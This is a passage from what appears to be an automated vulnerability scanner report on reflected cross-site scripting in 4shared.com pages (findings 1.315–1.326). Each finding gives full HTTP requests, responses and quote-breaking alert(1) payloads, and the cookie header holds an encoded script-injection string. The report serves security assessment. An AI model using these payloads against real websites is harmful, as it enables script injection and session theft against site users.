HTTP/1.1 404 /press_room972d4'-alert(1)-'1a3a2fd3041/
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=E37F9052D43247E6317C552797A3BBE9.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:10:15 GMT
Connection: close
Content-Length: 36107

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
peof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/press_room972d4'-alert(1)-'1a3a2fd3041/',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function en
...[SNIP]...

1.315. http://www.4shared.com/privacy.jsp [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/privacy.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 875c5'-alert(1)-'59a1a3d0f41 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /privacy.jsp875c5'-alert(1)-'59a1a3d0f41 HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /privacy.jsp875c5'-alert(1)-'59a1a3d0f41
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=286360513EE9EF896E39518D30D6D8AA.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:43 GMT
Connection: close
Content-Length: 36118

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
eof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/privacy.jsp875c5'-alert(1)-'59a1a3d0f41',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ens
...[SNIP]...

1.316. http://www.4shared.com/privacy.jsp [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/privacy.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 35670"-alert(1)-"3015378b77f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /privacy.jsp35670"-alert(1)-"3015378b77f HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /privacy.jsp35670"-alert(1)-"3015378b77f
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=9CA83E4A7CCCE2745DB3EEC1AE1A1846.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:42 GMT
Connection: close
Content-Length: 36107

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/privacy.jsp35670"-alert(1)-"3015378b77f";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.317. http://www.4shared.com/q/BAQD/1/books_office [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/q/BAQD/1/books_office

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f84fe"-alert(1)-"086eb606b7a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /f84fe"-alert(1)-"086eb606b7a/BAQD/1/books_office HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /f84fe"-alert(1)-"086eb606b7a/BAQD/1/books_office
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=28AE5917D14DA5B988790134206A2EC8.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:49 GMT
Connection: close
Content-Length: 36152

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/f84fe"-alert(1)-"086eb606b7a/BAQD/1/books_office";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedbac
...[SNIP]...

1.318. http://www.4shared.com/q/BAQD/1/books_office [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/q/BAQD/1/books_office

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload be4a7'-alert(1)-'404bfa82d8d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /be4a7'-alert(1)-'404bfa82d8d/BAQD/1/books_office HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /be4a7'-alert(1)-'404bfa82d8d/BAQD/1/books_office
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=053340F9A9559B6CA76E6BFBB91361DB.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:50 GMT
Connection: close
Content-Length: 36152

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...

if(typeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/be4a7'-alert(1)-'404bfa82d8d/BAQD/1/books_office',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
...[SNIP]...

1.319. http://www.4shared.com/q/BAQD/1/music [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/q/BAQD/1/music

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d8ddd"-alert(1)-"4eb60d1a81f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /d8ddd"-alert(1)-"4eb60d1a81f/BAQD/1/music HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /d8ddd"-alert(1)-"4eb60d1a81f/BAQD/1/music
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=1FB68892A373E29C54E58DFCA3C6C717.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:45 GMT
Connection: close
Content-Length: 36128

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/d8ddd"-alert(1)-"4eb60d1a81f/BAQD/1/music";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

1.320. http://www.4shared.com/q/BAQD/1/music [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/q/BAQD/1/music

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c6eed'-alert(1)-'24a977f03fa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c6eed'-alert(1)-'24a977f03fa/BAQD/1/music HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /c6eed'-alert(1)-'24a977f03fa/BAQD/1/music
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=8E2FD674DABFF037EC84FADBB0B5E6D7.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:46 GMT
Connection: close
Content-Length: 36128

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...

if(typeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/c6eed'-alert(1)-'24a977f03fa/BAQD/1/music',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

...[SNIP]...

1.321. http://www.4shared.com/q/BAQD/1/photo [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/q/BAQD/1/photo

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cd1ba"-alert(1)-"41986b68520 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cd1ba"-alert(1)-"41986b68520/BAQD/1/photo HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /cd1ba"-alert(1)-"41986b68520/BAQD/1/photo
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=67639F9FC77CA94F11137417A85EE2B9.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:46 GMT
Connection: close
Content-Length: 36128

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/cd1ba"-alert(1)-"41986b68520/BAQD/1/photo";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

1.322. http://www.4shared.com/q/BAQD/1/photo [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/q/BAQD/1/photo

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9206b'-alert(1)-'2b793a21a2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /9206b'-alert(1)-'2b793a21a2/BAQD/1/photo HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /9206b'-alert(1)-'2b793a21a2/BAQD/1/photo
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=D6D5884D6B251C13DE2D57E26A4AC327.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:47 GMT
Connection: close
Content-Length: 36123

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...

if(typeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/9206b'-alert(1)-'2b793a21a2/BAQD/1/photo',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

...[SNIP]...

1.323. http://www.4shared.com/q/BAQD/1/video [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/q/BAQD/1/video

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 858cf"-alert(1)-"bdd77823b47 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /858cf"-alert(1)-"bdd77823b47/BAQD/1/video HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /858cf"-alert(1)-"bdd77823b47/BAQD/1/video
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=3C640796F120D13D434DE54103841592.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:45 GMT
Connection: close
Content-Length: 36128

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/858cf"-alert(1)-"bdd77823b47/BAQD/1/video";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

1.324. http://www.4shared.com/q/BAQD/1/video [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/q/BAQD/1/video

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 68bf5'-alert(1)-'0cd50f992d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /68bf5'-alert(1)-'0cd50f992d/BAQD/1/video HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /68bf5'-alert(1)-'0cd50f992d/BAQD/1/video
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=E553A231DE43598D59197D1149EAF195.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:46 GMT
Connection: close
Content-Length: 36123

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...

if(typeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/68bf5'-alert(1)-'0cd50f992d/BAQD/1/video',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

...[SNIP]...

1.325. http://www.4shared.com/q/BBQD/1/books_office [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/q/BBQD/1/books_office

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e5cae'-alert(1)-'43c94727e82 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /e5cae'-alert(1)-'43c94727e82/BBQD/1/books_office HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /e5cae'-alert(1)-'43c94727e82/BBQD/1/books_office
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=4FDEC217B67C106B26A403E5325C8B19.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:10:02 GMT
Connection: close
Content-Length: 36152

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...

if(typeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/e5cae'-alert(1)-'43c94727e82/BBQD/1/books_office',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
...[SNIP]...

1.326. http://www.4shared.com/q/BBQD/1/books_office [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/q/BBQD/1/books_office

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fd152"-alert(1)-"2424e2b2550 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fd152"-alert(1)-"2424e2b2550/BBQD/1/books_office HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /fd152"-alert(1)-"2424e2b2550/BBQD/1/books_office
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=BC530E46FC3B2E00AA7E9B1A9CBE82FE.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:10:01 GMT
Connection: close
Content-Length: 36152

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/fd152"-alert(1)-"2424e2b2550/BBQD/1/books_office";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedbac
...[SNIP]...

1.327. http://www.4shared.com/q/BBQD/1/music [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/q/BBQD/1/music

Issue detail

